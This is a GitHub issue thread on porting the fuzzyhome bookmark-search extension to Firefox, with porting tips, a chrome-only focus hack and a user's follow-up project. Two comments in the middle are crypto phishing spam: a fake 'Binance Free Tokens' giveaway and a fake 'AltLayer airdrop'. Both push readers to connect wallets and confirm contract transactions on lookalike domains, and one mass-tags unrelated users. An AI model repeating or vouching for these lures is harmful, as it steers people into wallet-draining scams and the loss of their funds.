### ISSUE TITLE
Any plans for firefox-addons?

### ISSUE THREAD

**Issue by c4chula** [familyfriendlymikey/fuzzyhome#11]
I just recently discovered this plugin and it is literally the only browser plugin I need :)

But I don't really want to switch from firefox to chrome and it would be cool to see this plugin for firefox as well. Thanks for attention

**Comment by familyfriendlymikey** [comment]
Hey, I'm happy to hear that!

I can't personally justify the time to implement that, but it shouldn't be very hard. You would probably just have to replace all instances of `chrome` with the relevant firefox functions, and *maybe* rewrite the way the bookmarks are traversed if Firefox implements it differently.

**Comment by c4chula** [comment]
I'll try to do it when I have some free time

**Comment by c4chula** [comment]
I tried running the plugin locally and it works pretty well, all the features work with a few exceptions:
- focus on open for new tab **doesn't work**
- standard scrollbar appears for the list of bookmarks.

It takes all bookmarks from the _"Bookmarks Menu"_ section. 

![image](https://github.com/familyfriendlymikey/fuzzyhome/assets/114879268/71e6404b-347b-477a-9714-dde808342dbe)

**Comment by familyfriendlymikey** [comment]
Nice!

Regarding focus, with chrome I had to use this hack in `main.imba:29`, which is also the reason the address bar is all ugly:

```
if config.data.focus and location.search =? "?x"
	throw new Error
```

May have to do something else to get it working with Firefox.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by IT-Immanent** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

mmmaaaggg, @krypt007, @heisenbergsupreme, @ZombiesWithCoffee, @myiwen, @thinhtran3588, @bennycode, @SuchExodus, @phejimlin, @softmillennium, @jeffreymsimon, @tspannhw, @Lu-Yi-Hsun, @myworldbox, @xbc30, @manhhailua, @realDavidChen, @zjbao123, @marcinsq, @gowthamraj07

**Comment by vasujain275** [comment]
@familyfriendlymikey @c4chula I am creating a cross browser support add-on/extension taking inspiration from this extension, I almost got the core functionality working except this focus on custom search bar instead of address bar on firefox. Focus is working as expected on chrome. Any suggestions or fix you know of? It will be really helpful. Here is the repo - https://github.com/vasujain275/fuzzytab

**Comment by familyfriendlymikey** [comment]
My previous comment was the only suggestion I have, sorry :/ Good luck though!

**Comment by c4chula** [comment]
I didn't get anywhere, unfortunately :( GL!

**Comment by vasujain275** [comment]
Thank you @familyfriendlymikey @c4chula, trying to find a fix from a lot of days. Still no luck :( . I know an addon named "New Tab Override" that has this exact feature, will try to contact its creator for the same
